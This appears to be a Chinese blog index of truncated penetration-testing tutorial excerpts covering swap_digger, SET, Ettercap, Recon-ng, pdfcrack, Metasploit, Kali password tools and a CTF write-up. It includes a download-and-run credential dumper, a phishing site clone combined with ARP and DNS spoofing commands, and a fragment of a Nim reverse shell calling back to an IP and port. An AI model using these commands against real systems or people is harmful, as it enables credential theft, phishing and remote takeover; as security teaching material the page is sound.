swap_digger使用方法
swap_digger使用方法在目标机器上下载并运行:
123wget https://raw.githubusercontent.com/sevagas/swap_digger/master/swap_digger.shchmod +x swap_digger.shsudo ./swap_digger.sh -vx -c
-v输出冗余信息 -x获取扩展凭证 -c自动删除生成的工作目录。
功能有:自动提取swap并搜索Linux用户凭证、Web表单凭证、Web表单电子邮件、HTTP基本认证、WiFi SSID和密钥等。
SET常用方法
SET常用方法Web攻击向量依次选择选项1、2、3、1,即社会工程学攻击、Web攻击向量、证书获取攻击方式、使用Web模板,并输入目标主机IP地址,随后选择2,即克隆Google站点。
如果用户目录结构依赖/var/www/html目录,则需要复制/var/www/下所有文件到/var/www/html中,回车即可。
如果Apache等占用80端口,会提示关闭,y即可。
接下来需要使用Ettercap的dns_spoof插件实施ARP攻击和DNS欺骗。
修改/etc/ettercap/etter.dns,例如攻击主机IP为192.168.29.139,则添加:
1* A 192.168.29.139
使用Ettercap发起ARP攻击,启动dns_spoof插件,实施DNS欺骗:
1ettercap -Tq -M arp:remote -P dns_spoof /192.168.29.139// /192.168.29.2//
当目标主机访问任何网站时 ...
Recon-ng初探
Recon-ng初探模块安装Kali自带Recon-ng,但模块一个没装,得科学上网,然后recon-ng的shell中执行:
1marketplace install all
示例选择模块:
1modules load recon/domains-hosts/hackertarget
查看模块信息:
1info
设置目标:
1options set SOURCE blog.bbskali.cn
运行模块:
1show hosts
实战枚举百度网站子域名,并导出为csv。
12345678helpshow modulesuse recon/domains-hosts/baidu_siteshow optionsset SOURCE baidu.comrunuse reporting/csvrun
PDF加密解密
PDF加密解密给文件添加密码:
1pdftk kali.pdf output out.pdf user_pw 666666 #kali.pdf加密为out.pdf 密码为666666
暴力破解:
1pdfcrack -f out.pdf -n 6 -m 8 -c 0123456789 #-f要破解的文件 -n最短多少字符 -m 最长多少字符 -c使用的字符集
支持字典:
1pdfcrack -f out.pdf -w pass.txt
Nim入门
Nim入门配置按照实际情况配置IP及端口,保存文件为nimshell.nim。
123456789var targetIP="192.168.1.25" targetPort="4444"let exitMessage="Exiting.." changeDirectoryCommand="cd" defaultDirectory="C:\\"try: socket.connect(targetIP,Port(parseInt(targetPort)))
编译1nim c -d:mingw --app:gui nimshell.nim && mv nimshell.exe myshell.exe
Metasploit基础教程
Metasploit基础教程概述初始化启动PostgreSQL:
1service postgresql start
创建和初始化数据库:
1msfdb init
工作区创建123workspace #查看所有工作区workspace -a test #添加名为test的工作区workspace default #转到default工作区
导入扫描报告12db_import /root/openvas.xmlworkspace -v #查看导入的主机
模块查询预分析12host #查看扫描出的主机vulns #查看扫描出的漏洞
手动查找123456search [options] <keywords> [options]: -h 显示帮助 -o <file> 指定输出信息保存文件 格式csv -S <string> 搜索指定字符串 -u 指定搜索模块
部分keywords:
关键字
描述
aka
别名
author
作者
arch
架构
bid
Bugt ...
Kali-Linux渗透测试入门
Kali-Linux渗透测试入门信息收集发现主机netmask将IP范围转换为CIDR格式:
1netmask -c 192.168.0.0:192.168.2.255
将IP范围转换为标准子网掩码格式:
1netmask -s 192.168.0.0:192.168.2.0
traceroute获取目标主机路由条目:
1traceroute 62.234.110.28
nmap略。
netdiscover检查在线主机。
123netdiscover #尽可能发现多个在线主机netdiscover -r 192.168.1.0/24 #指定区间netdiscover -p #被动ARP监听
域名分析whois查找指定帐号/域名的用户相关信息。
1whois baidu.com
dmitry用途同上。
123dmitry -w baidu.com #whoisdmitry -s baidu.com -o subdomain #-s查子域名 -o输出文件 要挂梯子dmitry -p 192.168.29.136 #端口扫描
dnsenum收集域名信息,如:主机地址信息 ...
Kali-Linux常用密码攻击方法
Kali-Linux常用密码攻击方法Stasprocessor利用马尔可夫攻击方式分析已有的密码字典文件:
123456789statsgen [options] passwords.txt #--version #-h,--help #-o password.marsks,--output=password.masks 保护掩码和统计信息到一个文件 #--hiderare 隐藏比例<1%的统计项 #--minlength=8 过滤最小长度为8的密码 #--maxlength=8 #--charset=loweralpha,numeric 指定过滤的密码字符 #--simplemask=stringdigit,allspecial 过滤密掩码格式
例如分析rockyou.txt密码文件:
1statsgen rockyou.txt
内容分别为:
密码长度统计信息。
密码字符集统计。
密码复杂性统计。
简单掩码统计。
密码字符串掩码格式的高级统计。
掩码格式:
掩码格式
含义
?l
a~z
?u
A~ ...
Artfuscator使用方法
Artfuscator使用方法安装123456git clone https://github.com/JuliaPoo/Artfuscatorcd Artfuscatorgit submodule update --recursive --init --remotecd elvmmake art #事实证明报错也问题不大cd ..
使用在Artfuscator的目录下放置C语言文件,例如hewwo.c。再执行:
1make hewwo IMG=etc/niko-grey.png
其中,选择的图片为当下目录的etc/niko-grey.png。图片要求单通道灰度图片。
生成的文件在dist文件夹下,名称为hewwo.art的可执行文件。
NSSCTF-Round16个人解题报告
NSSCTF-Round#16 Basic个人解题报告test your Debugger三血!
很简单一个动调,动起来就行了。
CompileMe!!!二血!
一个自称为.NET8.0框架的C#工程,改成7.0运行发现类嵌套过多,爆栈了…
改写成C语言发现gcc不理我了,改成Python竟然也爆栈。
搓一个Python脚本把每个return的操作扒下来,记到文件里。
1234567891011121314f=open('Program.cs',encoding='utf-8')content=f.readlines()ptr=52res=[0 for i in range(0,20000)]res[0]=content[ptr][26:45]fin=res[0]for i in range(1,18278): ptr+=9 res[i]=content[ptr][26:45]f.close()f3=open("res.txt",'w')for i in range(0,18278): f ...